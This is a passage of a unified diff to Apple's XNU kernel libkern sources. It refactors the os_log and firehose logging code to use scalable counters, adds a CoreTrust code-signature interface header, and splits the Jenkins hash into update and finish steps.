|| !OS_ATOMIC_CONFIG_STARVATION_FREE_ONLY #endif // defined(KERNEL) || defined(OS_FIREHOSE_SPI) +#endif // __has_include() __END_DECLS diff --git a/libkern/firehose/firehose_types_private.h b/libkern/firehose/firehose_types_private.h index 27fef1448..9770351bf 100644 --- a/libkern/firehose/firehose_types_private.h +++ b/libkern/firehose/firehose_types_private.h @@ -78,6 +78,7 @@ OS_ENUM(firehose_stream, uint8_t, firehose_stream_memory_baseband = 6, _firehose_stream_max, + _firehose_stream_disabled = (uint8_t)-1, ); /*! @@ -131,9 +132,10 @@ OS_OPTIONS(firehose_tracepoint_flags, uint16_t, _firehose_tracepoint_flags_pc_style_main_plugin = 0x0003 << 1, _firehose_tracepoint_flags_pc_style_absolute = 0x0004 << 1, _firehose_tracepoint_flags_pc_style_uuid_relative = 0x0005 << 1, - _firehose_tracepoint_flags_pc_style__unused6 = 0x0006 << 1, + _firehose_tracepoint_flags_pc_style_large_shared_cache = 0x0006 << 1, _firehose_tracepoint_flags_pc_style__unused7 = 0x0007 << 1, _firehose_tracepoint_flags_base_has_unique_pid = 0x0010, + _firehose_tracepoint_flags_base_has_large_offset = 0x0020, ); /* @@ -264,14 +266,18 @@ OS_ENUM(_firehose_tracepoint_type_signpost, firehose_tracepoint_type_t, * @abstract * Flags for Log tracepoints (namespace signpost). * - * When flags are shared with the log type, they should havethe same values. + * When flags are shared with the log type, they should have the same values. */ OS_OPTIONS(_firehose_tracepoint_flags_signpost, uint16_t, + // shared with log _firehose_tracepoint_flags_signpost_has_private_data = 0x0100, _firehose_tracepoint_flags_signpost_has_subsystem = 0x0200, _firehose_tracepoint_flags_signpost_has_rules = 0x0400, _firehose_tracepoint_flags_signpost_has_oversize = 0x0800, _firehose_tracepoint_flags_signpost_has_context_data = 0x1000, + + // specific to signpost + _firehose_tracepoint_flags_signpost_has_name = 0x8000, ); /* MIG firehose push reply structure */ diff --git a/libkern/firehose/tracepoint_private.h b/libkern/firehose/tracepoint_private.h index 69c04c982..70c248722 100644 --- a/libkern/firehose/tracepoint_private.h +++ b/libkern/firehose/tracepoint_private.h @@ -27,7 +27,11 @@ #if KERNEL #include #endif +#if __has_include() #include +#else +#include +#endif #include "firehose_types_private.h" OS_ASSUME_NONNULL_BEGIN diff --git a/libkern/libkern/Makefile b/libkern/libkern/Makefile index 3f78b8f25..c7b51b5e6 100644 --- a/libkern/libkern/Makefile +++ b/libkern/libkern/Makefile @@ -10,7 +10,8 @@ INSTINC_SUBDIRS = \ machine \ c++ \ crypto \ - img4 + img4 \ + coretrust INSTINC_SUBDIRS_X86_64 = \ i386 INSTINC_SUBDIRS_X86_64H = \ diff --git a/libkern/libkern/OSKextLibPrivate.h b/libkern/libkern/OSKextLibPrivate.h index 6297be81c..90d7aaede 100644 --- a/libkern/libkern/OSKextLibPrivate.h +++ b/libkern/libkern/OSKextLibPrivate.h @@ -786,6 +786,12 @@ void kext_dump_panic_lists(int (*printf_func)(const char *fmt, ...)); #ifdef XNU_KERNEL_PRIVATE +/*! + * @define kOSKextReceiptQueried + * @abstract Whether or not the kext receipt has been successfully loaded. + */ +#define kOSKextReceiptQueried "OSKextReceiptQueried" + #if PRAGMA_MARK #pragma mark - /********************************************************************/ @@ -981,6 +987,7 @@ extern const vm_allocation_site_t * OSKextGetAllocationSiteForCaller(uintptr_t a extern uint32_t OSKextGetKmodIDForSite(const vm_allocation_site_t * site, char * name, vm_size_t namelen); extern void OSKextFreeSite(vm_allocation_site_t * site); +extern kern_return_t OSKextSetReceiptQueried(void); #if CONFIG_IMAGEBOOT extern int OSKextGetUUIDForName(const char *, uuid_t); diff --git a/libkern/libkern/c++/OSKext.h b/libkern/libkern/c++/OSKext.h index aff038533..cc456e254 100644 --- a/libkern/libkern/c++/OSKext.h +++ b/libkern/libkern/c++/OSKext.h @@ -315,6 +315,7 @@ private: unsigned int CPPInitialized:1; unsigned int jettisonLinkeditSeg:1; unsigned int resetSegmentsFromImmutableCopy:1; + unsigned int unloadUnsupported:1; } flags; uint32_t matchingRefCount; diff --git a/libkern/libkern/c++/OSString.h b/libkern/libkern/c++/OSString.h index c8cd5025f..463eb6a89 100644 --- a/libkern/libkern/c++/OSString.h +++ b/libkern/libkern/c++/OSString.h @@ -117,12 +117,12 @@ protected: unsigned int flags:14, length:18; - char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;; + char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string; #else /* APPLE_KEXT_ALIGN_CONTAINERS */ protected: - char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string;; + char * OS_PTRAUTH_SIGNED_PTR("OSString.string") string; unsigned int flags; unsigned int length; diff --git a/libkern/libkern/coretrust/Makefile b/libkern/libkern/coretrust/Makefile new file mode 100644 index 000000000..8faf50fee --- /dev/null +++ b/libkern/libkern/coretrust/Makefile @@ -0,0 +1,24 @@ +export MakeInc_cmd=${SRCROOT}/makedefs/MakeInc.cmd +export MakeInc_def=${SRCROOT}/makedefs/MakeInc.def +export MakeInc_rule=${SRCROOT}/makedefs/MakeInc.rule +export MakeInc_dir=${SRCROOT}/makedefs/MakeInc.dir + +include $(MakeInc_cmd) +include $(MakeInc_def) + +DATAFILES = +PRIVATE_DATAFILES = +KERNELFILES = +PRIVATE_KERNELFILES = coretrust.h + +INSTALL_MI_LIST = ${DATAFILES} +INSTALL_MI_LCL_LIST = ${PRIVATE_DATAFILES} +INSTALL_KF_MI_LIST = ${KERNELFILES} +INSTALL_KF_MI_LCL_LIST = ${PRIVATE_KERNELFILES} +EXPORT_MI_LIST = ${INSTALL_KF_MI_LCL_LIST} + +INSTALL_MI_DIR = libkern/coretrust +EXPORT_MI_DIR = libkern/coretrust + +include $(MakeInc_rule) +include $(MakeInc_dir) \ No newline at end of file diff --git a/libkern/libkern/coretrust/coretrust.h b/libkern/libkern/coretrust/coretrust.h new file mode 100644 index 000000000..dafe3db8a --- /dev/null +++ b/libkern/libkern/coretrust/coretrust.h @@ -0,0 +1,93 @@ +/* + * Copyright (c) 2020 Apple Inc. All rights reserved. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ + * + * This file contains Original Code and/or Modifications of Original Code + * as defined in and that are subject to the Apple Public Source License + * Version 2.0 (the 'License'). You may not use this file except in + * compliance with the License. The rights granted to you under the License + * may not be used to create, or enable the creation or redistribution of, + * unlawful or unlicensed copies of an Apple operating system, or to + * circumvent, violate, or enable the circumvention or violation of, any + * terms of an Apple operating system software license agreement. + * + * Please obtain a copy of the License at + * http://www.opensource.apple.com/apsl/ and read it before using this file. + * + * The Original Code and all software distributed under the License are + * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER + * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES, + * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT. + * Please see the License for the specific language governing rights and + * limitations under the License. + * + * @APPLE_OSREFERENCE_LICENSE_HEADER_END@ + */ + +#ifndef __CORETRUST_H +#define __CORETRUST_H + +#include +#include +#include + +#if XNU_KERNEL_PRIVATE +/* + * Only include this when building for XNU. CoreTrust will include its + * local copy of the header. + */ +#include +#endif + +/* + * We add more definitions as the need for them arises. Please refer + * to for more information. + */ + +typedef int (*coretrust_CTEvaluateAMFICodeSignatureCMS_t)( + const uint8_t *cms_data, + size_t cms_data_length, + const uint8_t *detached_data, + size_t detached_data_length, + bool allow_test_hierarchy, + const uint8_t **leaf_certificate, + size_t *leaf_certificate_length, + CoreTrustPolicyFlags *policy_flags, + CoreTrustDigestType *cms_digest_type, + CoreTrustDigestType *hash_agility_digest_type, + const uint8_t **digest_data, + size_t *digest_length + ); + +typedef struct _coretrust { + coretrust_CTEvaluateAMFICodeSignatureCMS_t CTEvaluateAMFICodeSignatureCMS; +} coretrust_t; + +__BEGIN_DECLS + +/*! + * @const coretrust + * The CoreTrust interface that was registered. + */ +extern const coretrust_t *coretrust; + +/*! + * @function coretrust_interface_register + * Registers the CoreTrust kext interface for use within the kernel proper. + * + * @param ct + * The interface to register. + * + * @discussion + * This routine may only be called once and must be called before late-const has + * been applied to kernel memory. + */ +OS_EXPORT OS_NONNULL1 +void +coretrust_interface_register(const coretrust_t *ct); + +__END_DECLS + +#endif // __CORETRUST_H diff --git a/libkern/libkern/ptrauth_utils.h b/libkern/libkern/ptrauth_utils.h index 765b93320..5aa469bab 100644 --- a/libkern/libkern/ptrauth_utils.h +++ b/libkern/libkern/ptrauth_utils.h @@ -58,10 +58,10 @@ */ #if __has_feature(ptrauth_calls) ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags); +ptrauth_utils_sign_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags); #else static inline ptrauth_generic_signature_t -ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags) +ptrauth_utils_sign_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags) { return 0; } @@ -89,10 +89,10 @@ ptrauth_utils_sign_blob_generic(__unused void * ptr, __unused size_t len_bytes, */ #if __has_feature(ptrauth_calls) void -ptrauth_utils_auth_blob_generic(void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature); +ptrauth_utils_auth_blob_generic(const void * ptr, size_t len_bytes, uint64_t data, int flags, ptrauth_generic_signature_t signature); #else static inline void -ptrauth_utils_auth_blob_generic(__unused void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature) +ptrauth_utils_auth_blob_generic(__unused const void * ptr, __unused size_t len_bytes, __unused uint64_t data, __unused int flags, __unused ptrauth_generic_signature_t signature) { return; } diff --git a/libkern/os/atomic_private_impl.h b/libkern/os/atomic_private_impl.h index 276a91f5e..933b0efa3 100644 --- a/libkern/os/atomic_private_impl.h +++ b/libkern/os/atomic_private_impl.h @@ -243,8 +243,8 @@ _os_atomic_mo_has_release(OS_ATOMIC_STD memory_order ord) #define _os_atomic_clang_op(p, v, m, o, op) ({ \ __auto_type _v = _os_atomic_value_cast(p, v); \ - __auto_type _r = _os_atomic_clang_op_orig(p, _v, m, o); \ - op(_r, _v); \ + __auto_type _s = _os_atomic_clang_op_orig(p, _v, m, o); \ + op(_s, _v); \ }) #if OS_ATOMIC_CONFIG_MEMORY_ORDER_DEPENDENCY diff --git a/libkern/os/hash.h b/libkern/os/hash.h index 264146fb9..3e90258e8 100644 --- a/libkern/os/hash.h +++ b/libkern/os/hash.h @@ -34,6 +34,30 @@ __BEGIN_DECLS +static inline uint32_t +os_hash_jenkins_update(const void *data, size_t length, uint32_t hash) +{ + const uint8_t *key = (const uint8_t *)data; + + for (size_t i = 0; i < length; i++) { + hash += key[i]; + hash += (hash << 10); + hash ^= (hash >> 6); + } + + return hash; +} + +static inline uint32_t +os_hash_jenkins_finish(uint32_t hash) +{ + hash += (hash << 3); + hash ^= (hash >> 11); + hash += (hash << 15); + + return hash; +} + /*! * @function os_hash_jenkins * @@ -56,20 +80,7 @@ __BEGIN_DECLS static inline uint32_t os_hash_jenkins(const void *data, size_t length) { - const uint8_t *key = (const uint8_t *)data; - uint32_t hash = 0; - - for (size_t i = 0; i < length; i++) { - hash += key[i]; - hash += (hash << 10); - hash ^= (hash >> 6); - } - - hash += (hash << 3); - hash ^= (hash >> 11); - hash += (hash << 15); - - return hash; + return os_hash_jenkins_finish(os_hash_jenkins_update(data, length, 0)); } /*! diff --git a/libkern/os/log.c b/libkern/os/log.c index 0cd4a9deb..c36981561 100644 --- a/libkern/os/log.c +++ b/libkern/os/log.c @@ -37,6 +37,7 @@ #include "trace_internal.h" #include "log_encode.h" +#include "log_mem.h" struct os_log_s { int a; @@ -44,6 +45,9 @@ struct os_log_s { struct os_log_s _os_log_default; struct os_log_s _os_log_replay; + +LOGMEM_STATIC_INIT(os_log_mem, 14, 9, 10); + extern vm_offset_t kernel_firehose_addr; extern firehose_chunk_t firehose_boot_chunk; @@ -65,24 +69,26 @@ extern int oslog_stream_open; extern void *OSKextKextForAddress(const void *); /* Counters for persistence mode */ -uint32_t oslog_p_total_msgcount = 0; -uint32_t oslog_p_metadata_saved_msgcount = 0; -uint32_t oslog_p_metadata_dropped_msgcount = 0; -uint32_t oslog_p_error_count = 0; -uint32_t oslog_p_saved_msgcount = 0; -uint32_t oslog_p_dropped_msgcount = 0; -uint32_t oslog_p_boot_dropped_msgcount = 0; -uint32_t oslog_p_coprocessor_total_msgcount = 0; -uint32_t oslog_p_coprocessor_dropped_msgcount = 0; +SCALABLE_COUNTER_DEFINE(oslog_p_total_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_metadata_saved_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_metadata_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_error_count); +SCALABLE_COUNTER_DEFINE(oslog_p_saved_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_boot_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_total_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_coprocessor_dropped_msgcount); +SCALABLE_COUNTER_DEFINE(oslog_p_unresolved_kc_msgcount); /* Counters for streaming mode */ -uint32_t oslog_s_total_msgcount = 0; -uint32_t oslog_s_error_count = 0; -uint32_t oslog_s_metadata_msgcount = 0; +SCALABLE_COUNTER_DEFINE(oslog_s_error_count); +/* Protected by the stream lock */ +uint32_t oslog_s_total_msgcount; +uint32_t oslog_s_metadata_msgcount; /* Counters for msgbuf logging */ -uint32_t oslog_msgbuf_msgcount = 0; -uint32_t oslog_msgbuf_dropped_msgcount = 0; +SCALABLE_COUNTER_DEFINE(oslog_msgbuf_msgcount) +SCALABLE_COUNTER_DEFINE(oslog_msgbuf_dropped_msgcount) static bool oslog_boot_done = false; @@ -112,36 +118,36 @@ static void _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool logging, bool addcr); static void -_os_log_to_log_internal(os_log_t oslog, os_log_type_t type, - const char *format, va_list args, void *addr, void *dso, bool driverKit); +_os_log_to_log_internal(os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit); - -static void -_os_log_actual(os_log_t oslog, os_log_type_t type, const char *format, void - *dso, void *addr, os_log_buffer_context_t context, bool driverKit); +static bool +os_log_turned_off(void) +{ + return atm_get_diagnostic_config() & (ATM_TRACE_DISABLE | ATM_TRACE_OFF); +} bool os_log_info_enabled(os_log_t log __unused) { - return true; + return !os_log_turned_off(); } bool os_log_debug_enabled(os_log_t log __unused) { - return true; + return !os_log_turned_off(); } -os_log_t -os_log_create(const char *subsystem __unused, const char *category __unused) +static bool +os_log_disabled(void) { - return &_os_log_default; + return atm_get_diagnostic_config() & ATM_TRACE_DISABLE; } -bool -_os_log_string_is_public(const char *str __unused) +os_log_t +os_log_create(const char *subsystem __unused, const char *category __unused) { - return true; + return &_os_log_default; } __attribute__((noinline, not_tail_called)) void @@ -226,29 +232,20 @@ static void _os_log_with_args_internal(os_log_t oslog, os_log_type_t type, const char *format, va_list args, void *addr, void *dso, bool driverKit, bool addcr) { - uint32_t logging_config = atm_get_diagnostic_config(); - boolean_t safe; - boolean_t logging; - if (format[0] == '\0') { return; } /* early boot can log to dmesg for later replay (27307943) */ - safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe()); - - if (logging_config & ATM_TRACE_DISABLE || logging_config & ATM_TRACE_OFF) { - logging = false; - } else { - logging = true; - } + bool safe = (startup_phase < STARTUP_SUB_EARLY_BOOT || oslog_is_safe()); + bool logging = !os_log_turned_off(); if (oslog != &_os_log_replay) { _os_log_to_msgbuf_internal(format, args, safe, logging, addcr); } if (safe && logging) { - _os_log_to_log_internal(oslog, type, format, args, addr, dso, driverKit); + _os_log_to_log_internal(type, format, args, addr, dso, driverKit); } } @@ -268,7 +265,7 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log va_list args_copy; if (!bsd_log_lock(safe)) { - os_atomic_inc(&oslog_msgbuf_dropped_msgcount, relaxed); + counter_inc(&oslog_msgbuf_dropped_msgcount); return; } @@ -350,177 +347,101 @@ _os_log_to_msgbuf_internal(const char *format, va_list args, bool safe, bool log bsd_log_unlock(); logwakeup(msgbufp); - os_atomic_inc(&oslog_msgbuf_msgcount, relaxed); + counter_inc(&oslog_msgbuf_msgcount); } -static void -_os_log_to_log_internal(os_log_t oslog, os_log_type_t type, - const char *format, va_list args, void *addr, void *dso, bool driverKit) +static firehose_stream_t +firehose_stream(os_log_type_t type) { - kc_format_t kcformat = KCFormatUnknown; - struct os_log_buffer_context_s context; - unsigned char buffer_data[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))); - os_log_buffer_t buffer = (os_log_buffer_t)buffer_data; - uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE]; - va_list args_copy; - - if (addr == NULL) { - return; - } - - if (!PE_get_primary_kc_format(&kcformat)) { - return; - } - - if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { - void *baseAddress = PE_get_kc_baseaddress(KCKindPrimary); - if (!baseAddress) { - return; - } - dso = baseAddress; - } else if (kcformat == KCFormatDynamic || kcformat == KCFormatFileset) { - if (dso == NULL) { - dso = (void *) OSKextKextForAddress(format); - if (dso == NULL) { - return; - } - } - if (!_os_trace_addr_in_text_segment(dso, format)) { - return; - } - if (!driverKit) { - void *dso_addr = (void *) OSKextKextForAddress(addr); - if (dso != dso_addr) { - return; - } - } - } - - memset(&context, 0, sizeof(context)); - memset(buffer, 0, OS_LOG_BUFFER_MAX_SIZE); + return (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) ? + firehose_stream_memory : firehose_stream_persist; +} - context.shimmed = true; - context.buffer = buffer; - context.content_sz = OS_LOG_BUFFER_MAX_SIZE - sizeof(*buffer); - context.pubdata = pubdata; - context.pubdata_sz = sizeof(pubdata); +static void +_os_log_actual(os_log_type_t type, const char *format, void *dso, void *addr, uint8_t *logdata, size_t logdata_sz, + firehose_tracepoint_flags_t flags, bool driverKit) +{ + firehose_tracepoint_id_u trace_id; - va_copy(args_copy, args); + firehose_stream_t stream = firehose_stream(type); + uint64_t timestamp = firehose_tracepoint_time(firehose_activity_flags_default); - os_atomic_inc(&oslog_p_total_msgcount, relaxed); - if (_os_log_encode(format, args_copy, 0, &context)) { - _os_log_actual(oslog, type, format, dso, addr, &context, driverKit); + if (driverKit) { + // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in + // the executable text + trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, + type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT)); } else { - os_atomic_inc(&oslog_p_error_count, relaxed); + // create trace_id after we've set additional flags + trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, + type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags)); } - va_end(args_copy); + + _firehose_trace(stream, trace_id, timestamp, logdata, logdata_sz, true); } -static inline size_t -_os_trace_write_location_for_address(uint8_t buf[static sizeof(uint64_t)], - void *dso, const void *address, firehose_tracepoint_flags_t *flags, __unused bool driverKit) +static void * +resolve_dso(const char *fmt, void *dso, void *addr, bool driverKit) { - uintptr_t shift_addr = (uintptr_t)address - (uintptr_t)dso; - kc_format_t kcformat = KCFormatUnknown; - __assert_only bool result = PE_get_primary_kc_format(&kcformat); - assert(result); - if (kcformat == KCFormatStatic || kcformat == KCFormatKCGEN) { - *flags = _firehose_tracepoint_flags_pc_style_shared_cache; - memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); - return sizeof(uint32_t); - } else { - kernel_mach_header_t *mh = dso; - - /* - * driverKit will have the dso set as MH_EXECUTE - * (it is logging from a syscall in the kernel) - * but needs logd to parse the address as an - * absolute pc. - */ - if (mh->filetype == MH_EXECUTE && !driverKit) { - *flags = _firehose_tracepoint_flags_pc_style_main_exe; - memcpy(buf, (uint32_t[]){ (uint32_t)shift_addr }, sizeof(uint32_t)); - return sizeof(uint32_t); - } else { - *flags = _firehose_tracepoint_flags_pc_style_absolute; - if (!driverKit) { - shift_addr = VM_KERNEL_UNSLIDE(address); - } else { - shift_addr = (uintptr_t) address; - } - memcpy(buf, (uintptr_t[]){ shift_addr }, sizeof(uintptr_t)); -#if __LP64__ - return 6; // 48 bits are enough -#else - return sizeof(uintptr_t); -#endif - } + if (!PE_get_primary_kc_format(&kcformat)) { + return NULL; } -} - -OS_ALWAYS_INLINE -static inline size_t -_os_log_buffer_pack(uint8_t *buffdata, size_t buffdata_sz, - os_log_buffer_context_t ctx) -{ - os_log_buffer_t buffer = ctx->buffer; - size_t buffer_sz = sizeof(*ctx->buffer) + ctx->content_sz; - size_t total_sz = buffer_sz + ctx->pubdata_sz; - - if (total_sz > buffdata_sz) { - return 0; + switch (kcformat) { + case KCFormatStatic: + case KCFormatKCGEN: + dso = PE_get_kc_baseaddress(KCKindPrimary); + break; + case KCFormatDynamic: + case KCFormatFileset: + if (!dso && (dso = (void *)OSKextKextForAddress(fmt)) == NULL) { + return NULL; + } + if (!_os_trace_addr_in_text_segment(dso, fmt)) { + return NULL; + } + if (!driverKit && (dso != (void *)OSKextKextForAddress(addr))) { + return NULL; + } + break; + default: + panic("unknown KC format type"); } - memcpy(buffdata, buffer, buffer_sz); - memcpy(&buffdata[buffer_sz], ctx->pubdata, ctx->pubdata_sz); - return total_sz; + return dso; } static void -_os_log_actual(os_log_t oslog __unused, os_log_type_t type, const char *format, - void *dso, void *addr, os_log_buffer_context_t context, bool driverKit) +_os_log_to_log_internal(os_log_type_t type, const char *fmt, va_list args, void *addr, void *dso, bool driverKit) { - firehose_stream_t stream; - firehose_tracepoint_flags_t flags = 0; - firehose_tracepoint_id_u trace_id; - uint8_t buffdata[OS_LOG_BUFFER_MAX_SIZE]; - size_t addr_len = 0, buffdata_sz; - uint64_t timestamp; - uint64_t thread_id; - - // dso == the start of the binary that was loaded - addr_len = _os_trace_write_location_for_address(buffdata, dso, addr, &flags, driverKit); - buffdata_sz = _os_log_buffer_pack(buffdata + addr_len, - sizeof(buffdata) - addr_len, context); - if (buffdata_sz == 0) { + counter_inc(&oslog_p_total_msgcount); + + if (addr == NULL) { + counter_inc(&oslog_p_unresolved_kc_msgcount); return; } - buffdata_sz += addr_len; - timestamp = firehose_tracepoint_time(firehose_activity_flags_default); - thread_id = thread_tid(current_thread()); - - if (driverKit) { - // set FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT so logd will not try to find the format string in - // the executable text - trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, - type, flags, (uint32_t)((uintptr_t)addr | FIREHOSE_TRACEPOINT_PC_DYNAMIC_BIT)); - } else { - // create trace_id after we've set additional flags - trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, - type, flags, _os_trace_offset(dso, format, (_firehose_tracepoint_flags_activity_t)flags)); + if ((dso = resolve_dso(fmt, dso, addr, driverKit)) == NULL) { + counter_inc(&oslog_p_unresolved_kc_msgcount); + return; } - if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) { - stream = firehose_stream_memory; + uint8_t buffer[OS_LOG_BUFFER_MAX_SIZE] __attribute__((aligned(8))) = { 0 }; + struct os_log_context_s ctx; + + os_log_context_init(&ctx, &os_log_mem, buffer, sizeof(buffer)); + + if (os_log_context_encode(&ctx, fmt, args, addr, dso, driverKit)) { + _os_log_actual(type, fmt, dso, addr, ctx.ctx_buffer, ctx.ctx_content_sz, + ctx.ctx_ft_flags, driverKit); } else { - stream = firehose_stream_persist; + counter_inc(&oslog_p_error_count); } - _firehose_trace(stream, trace_id, timestamp, buffdata, buffdata_sz, true); + + os_log_context_free(&ctx); } bool @@ -529,14 +450,18 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type, { firehose_tracepoint_id_u trace_id; firehose_tracepoint_id_t return_id = 0; - firehose_stream_t stream; uint8_t pubdata[OS_LOG_BUFFER_MAX_SIZE]; size_t wr_pos = 0; + if (os_log_turned_off()) { + return false; + } + if (buff_len + 16 + sizeof(uint32_t) > OS_LOG_BUFFER_MAX_SIZE) { return false; } + firehose_stream_t stream = firehose_stream(type); // unlike kext, where pc is used to find uuid, in coprocessor logs the uuid is passed as part of the tracepoint firehose_tracepoint_flags_t flags = _firehose_tracepoint_flags_pc_style_uuid_relative; @@ -551,20 +476,14 @@ os_log_coprocessor(void *buff, uint64_t buff_len, os_log_type_t type, trace_id.ftid_value = FIREHOSE_TRACE_ID_MAKE(firehose_tracepoint_namespace_log, type, flags, offset); - if (type == OS_LOG_TYPE_INFO || type == OS_LOG_TYPE_DEBUG) { - stream = firehose_stream_memory; - } else { - stream = firehose_stream_persist; - } - - os_atomic_inc(&oslog_p_coprocessor_total_msgcount, relaxed); + counter_inc(&oslog_p_coprocessor_total_msgcount); // send firehose tracepoint containing os log to firehose buffer return_id = _firehose_trace(stream, trace_id, timestamp, pubdata, buff_len + wr_pos, stream_log); if (return_id == 0) { - os_atomic_inc(&oslog_p_coprocessor_dropped_msgcount, relaxed); + counter_inc(&oslog_p_coprocessor_dropped_msgcount); return false; } return true; @@ -582,7 +501,7 @@ _firehose_trace(firehose_stream_t stream, firehose_tracepoint_id_u ftid, if (slowpath(ft_size + publen > _firehose_chunk_payload_size)) { // We'll need to have some handling here. For now - return 0 - os_atomic_inc(&oslog_p_error_count, relaxed); + counter_inc(&oslog_p_error_count); return 0; } @@ -604,11 +523,11 @@ out: if (!fastpath(ft)) { if (oslog_boot_done) { if (stream == firehose_stream_metadata) { - os_atomic_inc(&oslog_p_metadata_dropped_msgcount, relaxed); + counter_inc(&oslog_p_metadata_dropped_msgcount); } else { // If we run out of space in the persistence buffer we're // dropping the message. - os_atomic_inc(&oslog_p_dropped_msgcount, relaxed); + counter_inc(&oslog_p_dropped_msgcount); } return 0; } @@ -619,7 +538,7 @@ out: offset = firehose_chunk_tracepoint_try_reserve(fbc, stamp, firehose_stream_persist, 0, (uint16_t)publen, 0, NULL); if (offset <= 0) { - os_atomic_inc(&oslog_p_boot_dropped_msgcount, relaxed); + counter_inc(&oslog_p_boot_dropped_msgcount); return 0; } @@ -627,7 +546,7 @@ out: thread_tid(current_thread()), offset); memcpy(ft->ft_data, pubdata, publen); firehose_chunk_tracepoint_end(fbc, ft, ftid); - os_atomic_inc(&oslog_p_saved_msgcount, relaxed); + counter_inc(&oslog_p_saved_msgcount); return ftid.ftid_value; } if (!oslog_boot_done) { @@ -637,9 +556,9 @@ out: __firehose_buffer_tracepoint_flush(ft, ftid); if (stream == firehose_stream_metadata) { - os_atomic_inc(&oslog_p_metadata_saved_msgcount, relaxed); + counter_inc(&oslog_p_metadata_saved_msgcount); } else { - os_atomic_inc(&oslog_p_saved_msgcount, relaxed); + counter_inc(&oslog_p_saved_msgcount); } return ftid.ftid_value; } @@ -686,6 +605,10 @@ os_log_coprocessor_register(const char *uuid, const char *file_path, bool copy) char path[PATH_MAX + sizeof(struct firehose_trace_uuid_info_s)]; } buf; + if (os_log_disabled()) { + return; + } + if (path_size > PATH_MAX) { return; } @@ -716,6 +639,10 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid, { oslog_stream_buf_entry_t m_entry = NULL; + if (os_log_disabled()) { + return; + } + // If streaming mode is not on, only log the metadata // in the persistence buffer @@ -730,7 +657,7 @@ firehose_trace_metadata(firehose_stream_t stream, firehose_tracepoint_id_u ftid, m_entry = oslog_stream_create_buf_entry(oslog_stream_link_type_metadata, ftid, stamp, pubdata, publen); if (!m_entry) { - os_atomic_inc(&oslog_s_error_count, relaxed); + counter_inc(&oslog_s_error_count); goto finish; } @@ -855,9 +782,9 @@ test_os_log() T_ASSERT_EQ_INT(TRUE, os_log_debug_enabled(log_handle), "os_log_debug is enabled"); T_ASSERT_EQ_PTR(&_os_log_default, OS_LOG_DEFAULT, "ensure OS_LOG_DEFAULT is _os_log_default"); - total_msg = oslog_p_total_msgcount; - saved_msg = oslog_p_saved_msgcount; - dropped_msg = oslog_p_dropped_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); + saved_msg = counter_load(&oslog_p_saved_msgcount); + dropped_msg = counter_load(&oslog_p_dropped_msgcount); T_LOG("oslog internal counters total %u , saved %u, dropped %u", total_msg, saved_msg, dropped_msg); T_LOG("Validating with uniqid %u u64 %llu", uniqid, a); @@ -886,45 +813,45 @@ test_os_log() } /* for enabled logging printfs should be saved in oslog as well */ - T_EXPECT_GE_UINT((oslog_p_total_msgcount - total_msg), 2, "atleast 2 msgs should be seen by oslog system"); + T_EXPECT_GE_UINT((counter_load(&oslog_p_total_msgcount) - total_msg), 2, "atleast 2 msgs should be seen by oslog system"); a = mach_absolute_time(); total_seqno = 1; seqno = 1; - total_msg = oslog_p_total_msgcount; - saved_msg = oslog_p_saved_msgcount; - dropped_msg = oslog_p_dropped_msgcount; + total_msg = counter_load(&oslog_p_total_msgcount); + saved_msg = counter_load(&oslog_p_saved_msgcount); + dropped_msg = counter_load(&oslog_p_dropped_msgcount); datalen = scnprintf(databuffer, sizeof(databuffer), TESTOSLOGFMT("oslog_info"), uniqid, seqno, total_seqno); checksum = crc32(0, databuffer, datalen); os_log_info(log_handle, TESTOSLOG("oslog_info") 